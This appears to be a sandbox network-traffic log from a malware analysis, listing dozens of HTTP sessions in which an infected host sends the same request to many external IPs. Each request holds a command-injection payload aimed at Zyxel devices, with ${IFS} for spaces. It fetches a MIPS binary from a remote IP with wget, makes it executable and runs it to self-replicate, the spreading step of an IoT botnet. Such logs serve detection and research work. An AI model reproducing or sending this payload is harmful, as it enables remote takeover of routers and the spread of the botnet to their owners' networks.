                                                Jan 29, 2024 07:07:39.125502110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2012192.168.2.23504485.103.234.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125569105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2013192.168.2.2355546105.199.34.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125621080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2014192.168.2.235792084.188.58.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125655890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2015192.168.2.234308649.20.47.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125679016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2016192.168.2.2333080137.179.200.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125718117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2017192.168.2.234838490.64.254.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125766993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2018192.168.2.2340746121.8.68.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125792027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2019192.168.2.2355180204.24.100.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125870943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2020192.168.2.2337458179.69.127.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125871897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2021192.168.2.2342156115.231.112.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125905037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2022192.168.2.2333690129.144.198.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125969887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2023192.168.2.2350256184.160.192.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125996113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2024192.168.2.2340432183.64.192.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126070023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2025192.168.2.233389692.110.100.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126121998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2026192.168.2.2360862120.139.81.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126156092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2027192.168.2.2341464153.191.37.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126204967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2028192.168.2.2355594145.80.38.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126254082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2029192.168.2.2334822102.17.95.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126277924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2030192.168.2.2346072183.223.35.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126315117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2031192.168.2.235425035.239.32.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126364946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2032192.168.2.234285665.44.217.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126401901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2033192.168.2.2356386189.192.242.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126435041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2034192.168.2.234289038.222.7.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126509905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2035192.168.2.2341036118.173.61.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126538992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2036192.168.2.2346680109.254.79.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126564980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2037192.168.2.2339262211.87.33.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126605988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2038192.168.2.2360700195.91.150.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126679897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2039192.168.2.2338914179.240.89.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126713991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2040192.168.2.234118425.216.239.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126739979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2041192.168.2.2346724193.44.97.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126770020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2042192.168.2.2344062173.52.251.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126813889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2043192.168.2.234292073.21.172.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126851082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2044192.168.2.234419885.79.155.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126868010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2045192.168.2.2352914142.40.241.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126935005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2046192.168.2.235579245.161.164.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.126979113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2047192.168.2.2339554109.29.251.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127077103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2048192.168.2.2355092153.48.49.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127078056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2049192.168.2.2347660112.122.205.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127130985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2050192.168.2.2346932102.170.210.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127203941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2051192.168.2.23424669.36.208.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127242088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2052192.168.2.2351902192.44.29.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127295017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2053192.168.2.2345316102.24.3.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127338886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2054192.168.2.2359984155.170.103.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127362967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2055192.168.2.2335668155.31.183.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127408028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2056192.168.2.2337306112.178.60.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127489090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2057192.168.2.2339520203.170.207.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127540112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2058192.168.2.234287827.37.45.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127588987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2059192.168.2.2347706174.66.34.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127624035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2060192.168.2.2352432160.60.184.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127654076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2061192.168.2.235748413.95.205.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127686977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2062192.168.2.2357356179.177.38.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127726078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2063192.168.2.2341188126.114.54.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127773046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2064192.168.2.234090479.129.145.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127820015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2065192.168.2.2334930107.242.14.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127854109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2066192.168.2.233723877.69.72.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127876997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2067192.168.2.2359850179.139.202.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127916098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2068192.168.2.2338022178.149.161.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127979040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2069192.168.2.2333820157.188.223.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.127996922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2070192.168.2.234929850.66.156.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128032923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2071192.168.2.233376241.130.111.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128084898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2072192.168.2.2344688181.218.237.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128110886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2073192.168.2.2346080216.217.144.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128148079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2074192.168.2.2346116222.23.198.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.128202915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2075192.168.2.234162293.7.153.62443
                                                TimestampBytes transferredDirectionData
